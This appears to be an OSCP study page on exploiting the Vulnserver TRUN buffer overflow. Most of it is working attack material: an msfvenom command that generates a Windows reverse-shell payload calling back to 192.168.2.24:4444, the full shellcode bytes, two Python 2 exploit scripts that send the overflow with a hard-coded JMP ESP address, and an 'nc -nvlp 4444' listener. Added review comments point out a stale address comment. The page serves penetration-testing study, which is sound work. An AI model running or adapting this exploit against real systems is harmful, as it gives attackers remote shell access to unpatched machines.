OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode

Generate the shellcode with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf

OSCP Security Technology - Modifying Shellcode

buffer.py

#!/usr/bin/python

import socket
import os
import sys

# Address and TCP port of the service this script connects to.
host="192.168.2.34"
port=9999

# Payload bytes produced by the msfvenom command below. Per that command line:
# -b "\x00" asks msfvenom to keep NUL bytes out of the output, -a x86 /
# --platform windows select the architecture, and LHOST/LPORT are the address
# and port the reverse-shell payload is configured to connect back to.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
# 351 bytes (27 lines of 13 bytes each)

buf =  b""
buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9"
buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e"
buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee"
buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38"
buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c"
buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d"
buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe"
buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa"
buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa"
buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0"
buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a"
buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc"
buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54"
buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26"
buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf"
buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f"
buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37"
buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65"
buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40"
buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67"
buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77"
buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6"
buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9"
buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4"
buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde"
buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4"

# 77A373CD   FFE4             JMP ESP
# The 4-byte string "\xcd\x73\xa3\x77" used below is this address written in
# little-endian byte order.

# Layout of the message built on the next line:
#   "TRUN /.:/"    command prefix
#   "A" * 2003     filler; presumably the offset of the saved return address
#   4 bytes        the hard-coded address from the comment above
#   "\x90" * 16    sixteen x86 NOP bytes ahead of the payload
#   buf            the msfvenom payload
#   "C" * (...)    padding so that everything after the prefix totals 5060 bytes
# NOTE(review): the layout depends on a fixed, predictable address and on the
# bytes after it being executable where they land (presumably the stack). ASLR
# and DEP/NX are the mitigations aimed at those two assumptions; the page does
# not state which of them the target build has.
# NOTE(review): str literals are concatenated with the bytes object buf, so
# this expression only evaluates on Python 2, where both are the same type.
buffer = "TRUN /.:/" + "A" * 2003 + "\xcd\x73\xa3\x77" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))

# Open one TCP connection, send the message with a single send() call, and
# close without reading any reply.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()

Run the script.

OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode

Modify the script: change the 4-byte address that follows the "A" filler to "\xaf\x11\x50\x62".

#!/usr/bin/python

import socket
import os
import sys

# Address and TCP port of the service this script connects to.
host="192.168.2.34"
port=9999

# Payload bytes produced by the msfvenom command below. Per that command line:
# -b "\x00" asks msfvenom to keep NUL bytes out of the output, -a x86 /
# --platform windows select the architecture, and LHOST/LPORT are the address
# and port the reverse-shell payload is configured to connect back to.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 EXITFUNC=thread -f python -a x86 --platform windows -b "\x00" -v buf
# 351 bytes (27 lines of 13 bytes each)

buf =  b""
buf += b"\xbb\xb0\xb5\x1b\xfb\xdb\xda\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x83\xef\xfc\x31\x5f\x0e\x03\xef\xbb\xf9"
buf += b"\x0e\xf3\x2c\x7f\xf0\x0b\xad\xe0\x78\xee\x9c\x20\x1e"
buf += b"\x7b\x8e\x90\x54\x29\x23\x5a\x38\xd9\xb0\x2e\x95\xee"
buf += b"\x71\x84\xc3\xc1\x82\xb5\x30\x40\x01\xc4\x64\xa2\x38"
buf += b"\x07\x79\xa3\x7d\x7a\x70\xf1\xd6\xf0\x27\xe5\x53\x4c"
buf += b"\xf4\x8e\x28\x40\x7c\x73\xf8\x63\xad\x22\x72\x3a\x6d"
buf += b"\xc5\x57\x36\x24\xdd\xb4\x73\xfe\x56\x0e\x0f\x01\xbe"
buf += b"\x5e\xf0\xae\xff\x6e\x03\xae\x38\x48\xfc\xc5\x30\xaa"
buf += b"\x81\xdd\x87\xd0\x5d\x6b\x13\x72\x15\xcb\xff\x82\xfa"
buf += b"\x8a\x74\x88\xb7\xd9\xd2\x8d\x46\x0d\x69\xa9\xc3\xb0"
buf += b"\xbd\x3b\x97\x96\x19\x67\x43\xb6\x38\xcd\x22\xc7\x5a"
buf += b"\xae\x9b\x6d\x11\x43\xcf\x1f\x78\x0c\x3c\x12\x82\xcc"
buf += b"\x2a\x25\xf1\xfe\xf5\x9d\x9d\xb2\x7e\x38\x5a\xb4\x54"
buf += b"\xfc\xf4\x4b\x57\xfd\xdd\x8f\x03\xad\x75\x39\x2c\x26"
buf += b"\x85\xc6\xf9\xe9\xd5\x68\x52\x4a\x85\xc8\x02\x22\xcf"
buf += b"\xc6\x7d\x52\xf0\x0c\x16\xf9\x0b\xc7\xd9\x56\x11\x0f"
buf += b"\xb2\xa4\x15\x3e\x1e\x20\xf3\x2a\x8e\x64\xac\xc2\x37"
buf += b"\x2d\x26\x72\xb7\xfb\x43\xb4\x33\x08\xb4\x7b\xb4\x65"
buf += b"\xa6\xec\x34\x30\x94\xbb\x4b\xee\xb0\x20\xd9\x75\x40"
buf += b"\x2e\xc2\x21\x17\x67\x34\x38\xfd\x95\x6f\x92\xe3\x67"
buf += b"\xe9\xdd\xa7\xb3\xca\xe0\x26\x31\x76\xc7\x38\x8f\x77"
buf += b"\x43\x6c\x5f\x2e\x1d\xda\x19\x98\xef\xb4\xf3\x77\xa6"
buf += b"\x50\x85\xbb\x79\x26\x8a\x91\x0f\xc6\x3b\x4c\x56\xf9"
buf += b"\xf4\x18\x5e\x82\xe8\xb8\xa1\x59\xa9\xd9\x43\x4b\xc4"
buf += b"\x71\xda\x1e\x65\x1c\xdd\xf5\xaa\x19\x5e\xff\x52\xde"
buf += b"\x7e\x8a\x57\x9a\x38\x67\x2a\xb3\xac\x87\x99\xb4\xe4"

# 77A373CD   FFE4             JMP ESP
# NOTE(review): stale comment. The 4-byte value used below is
# "\xaf\x11\x50\x62", which is 0x625011AF in little-endian order, not 77A373CD.
# Presumably a JMP ESP at the new address; the page does not show where it was
# found, so confirm and update the comment above.

# Layout of the message built on the next line:
#   "TRUN /.:/"    command prefix
#   "A" * 2003     filler; presumably the offset of the saved return address
#   4 bytes        the hard-coded address "\xaf\x11\x50\x62"
#   "\x90" * 16    sixteen x86 NOP bytes ahead of the payload
#   buf            the msfvenom payload
#   "C" * (...)    padding so that everything after the prefix totals 5060 bytes
# NOTE(review): the layout depends on a fixed, predictable address and on the
# bytes after it being executable where they land (presumably the stack). ASLR
# and DEP/NX are the mitigations aimed at those two assumptions; the page does
# not state which of them the target build has.
# NOTE(review): str literals are concatenated with the bytes object buf, so
# this expression only evaluates on Python 2, where both are the same type.
buffer = "TRUN /.:/" + "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))

# Open one TCP connection, send the message with a single send() call, and
# close without reading any reply.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(buffer)
expl.close()
nc -nvlp 4444

OSCP Security Technology - Modifying Shellcode

OSCP Security Technology - Modifying Shellcode

Refer to:

http://sh3llc0d3r.com/vulnserver-trun-command-buffer-overflow-exploit/

OSCP Security Technology - Modifying Shellcode
